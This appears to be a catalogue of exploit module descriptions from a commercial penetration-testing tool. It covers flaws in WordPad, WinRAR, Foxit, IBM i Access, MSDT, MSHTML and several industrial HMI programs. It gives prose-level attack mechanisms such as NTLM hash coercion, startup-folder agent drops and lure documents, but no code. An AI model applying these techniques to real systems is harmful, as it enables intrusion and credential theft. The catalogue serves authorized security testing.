This exploit leverages an Information Disclosure vulnerability in Microsoft WordPad. The vulnerability is associated with legacy functionality to convert an OLE 1 storage object (OLESTREAM) to the new IStorage format. By crafting a file with a malicious OLE 1 LinkedObject, an attacker can coerce authentication to an untrusted server and steal NTLM hashes. This exploit does not install an agent, it manages to obtain the NTML hash of a legitimate user.
In WinRAR versions prior to 6.23, there is a vulnerability that allows attackers to execute arbitrary code. This vulnerability occurs when a user tries to open a harmless file within a ZIP archive. The issue arises when the ZIP archive contains a benign file, such as a regular .PDF file, and also a folder with the same name as the benign file. During an attempt to access the benign file, the contents of the folder, which may include executable content, are processed, leading to the execution of arbitrary code.
Foxit PDF Reader, in an oversight, exposes a JavaScript interface capable of writing arbitrary files. This mishap is what makes the software susceptible to attacks. An adversary can manipulate this vulnerability to execute code within the context of the current user, thereby gaining unauthorized control over the system. The vulnerable method is exportXFAData. This exploit will write the agent to the startup folder. This means that the user must logoff and login again in order to execute the agent.
IBM i Access Client Solutions is vulnerable to DLL hijacking when certain features are run on a Windows operating system that leverage native code. IBM has addressed this CVE by providing a fix to IBM i Access Client Solutions as described in the remediation/fixes section. The attacker must entice a victim into opening a specially crafted .hod, .bchx, .ws, .dttx and dtfx file. This file and the associated binary may be delivered to a user through remote WebDAV shares or zipped attach. An attacker may exploit this issue to execute arbitrary code.
This module exploits a vulnerability in Microsoft MSDT, which can be leveraged to execute arbitrary code on vulnerable machines by convincing an unsuspecting user to open a malicious document.
This module exploits a vulnerability in Microsoft MSHTML, which can be leveraged to execute arbitrary code on vulnerable machines by convincing an unsuspecting user to visit a malicious web site.
A stack-based buffer overflow in WECON LeviStudioU allows an attacker to execute arbitrary code via crafted .XML file. This module runs a malicious web server on the Core Impact Console and waits for an unsuspecting user to trigger the exploit by connecting to it.
This module runs a malicious web server on the Core Impact Console and waits for an unsuspecting user to trigger the exploit by connecting to it.
Eaton HMISoft is prone to a buffer-overflow vulnerability that occurs because it fails to perform adequate boundary checks on user-supplied data via a crafted .VU3 document. This module runs a malicious web server on the Core Impact Console and waits for an unsuspecting user to trigger the exploit by connecting to it.
Delta Automation CNCSoft Screen Editor is prone to a buffer-overflow vulnerability that occurs because it fails to perform adequate boundary checks on user-supplied data via a crafted .DPB document. This module runs a malicious web server on the Core Impact Console and waits for an unsuspecting user to trigger the exploit by connecting to it.